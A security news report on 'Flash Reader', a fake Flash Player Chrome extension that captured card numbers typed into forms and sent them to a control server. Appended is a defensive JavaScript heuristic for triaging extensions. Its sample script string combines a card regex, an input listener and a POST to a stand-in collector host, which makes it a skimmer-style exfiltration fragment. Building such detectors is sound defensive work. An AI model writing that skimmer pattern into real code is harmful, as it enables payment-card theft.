Extension for Google Chrome stole information about users' bank cards

Brother

Cybersecurity specialists from Telefonica (a subdivision of ElevenPaths) have discovered a malicious extension called Flash Reader (a fake Flash Player) in the official Chrome Web Store; it was capable of stealing information about users' bank cards. Notably, the malware was uploaded to the store back in February 2018, but only about 400 people ended up using it.


Experts say that the extension was initially distributed through the now-inaccessible page http://fbsgang[.]info/flashplayer/, to which the criminals apparently redirected the traffic of victims hit by malicious ads or exploit kits. A classic trick was used to deceive users: a message about the urgent need to install Flash to continue working. The link offered to users led to the Flash Reader page in the Chrome Web Store.

The malicious extension intercepted any content that the user entered into forms on any site, and was especially interested in Visa, Mastercard, American Express and Discover card numbers.


As soon as the malware detected card information, the collected data was transmitted to the control server (http://fbsgang[.]info/cc/gate.php), which is currently unavailable. It is worth noting that on January 15, 2019, when the ElevenPaths report was published, the extension was still available in the official store; the dead control server did not guarantee users' safety or that the criminals would not start a new campaign. Google engineers have since removed Flash Reader from the Chrome Web Store.


The researchers note that the malware only collected information about card numbers, ignoring owner names, CVV codes, and other data. Considering that the extension was installed by only 400 users, experts suggest that Flash Reader was just a test tool for unknown hackers preparing for a more serious campaign.
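
For defenders reviewing installed extensions, the behaviour described above (form interception on every site, card-number matching, upload to a remote server) can be turned into a static triage heuristic. The sketch below is an added example, not code from the ElevenPaths report or from the extension itself; the signal patterns, function names and the sample manifest and script text are assumptions constructed for illustration.

```javascript
// Added example: static triage heuristic for an unpacked Chrome extension.
// Patterns, names and sample data are assumptions, not taken from the report.
const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

// Each signal is a regex run over the extension's script source text.
const SIGNALS = {
  // Source text of common card-brand regexes (Visa, Mastercard, Amex, Discover).
  cardPattern: /4\[0-9\]\{12\}|5\[1-5\]\[0-9\]\{14\}|3\[47\]\[0-9\]\{13\}|6\(\?:011\|5/,
  formHook: /addEventListener\(\s*['"](?:submit|input|change|keyup|blur)['"]/,
  netSend: /XMLHttpRequest|\bfetch\s*\(|sendBeacon\s*\(|\$\.(?:post|ajax)\s*\(/,
};

// Content-script entries that are injected into every site the user visits.
function broadContentScripts(manifest) {
  return (manifest.content_scripts || []).filter((cs) =>
    (cs.matches || []).some((m) => BROAD_HOSTS.has(m)));
}

// Hard-coded remote hosts in a script: candidates for block lists and proxy-log searches.
function remoteHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) hosts.add(m[1].toLowerCase());
  return [...hosts].sort();
}

// A file is flagged only when it runs on all sites AND shows all three signals.
function triageExtension(manifest, scripts) {
  const injected = new Set(broadContentScripts(manifest).flatMap((cs) => cs.js || []));
  return Object.entries(scripts).map(([file, source]) => {
    const hits = Object.keys(SIGNALS).filter((k) => SIGNALS[k].test(source));
    const injectedEverywhere = injected.has(file);
    return { file, injectedEverywhere, hits, hosts: remoteHosts(source),
             suspicious: injectedEverywhere && hits.length === Object.keys(SIGNALS).length };
  });
}

// Constructed sample input: non-functional fragments, not the real extension.
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  content_scripts: [{ matches: ["<all_urls>"], js: ["content.js"] }],
  background: { scripts: ["bg.js"] },
};
const SAMPLE_SCRIPTS = {
  "content.js": [
    "var visa = /^4[0-9]{12}(?:[0-9]{3})?$/;",
    "document.addEventListener('input', onField, true);",
    "xhr = new XMLHttpRequest(); xhr.open('POST', 'https://collector.example/gate');",
  ].join("\n"),
  "bg.js": "chrome.runtime.onInstalled.addListener(function () {});",
};

console.log(JSON.stringify(triageExtension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS), null, 2));
```

A flagged file is a lead for manual review rather than a verdict: legitimate payment or autofill extensions can match the same signals, and obfuscated code can evade them.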
 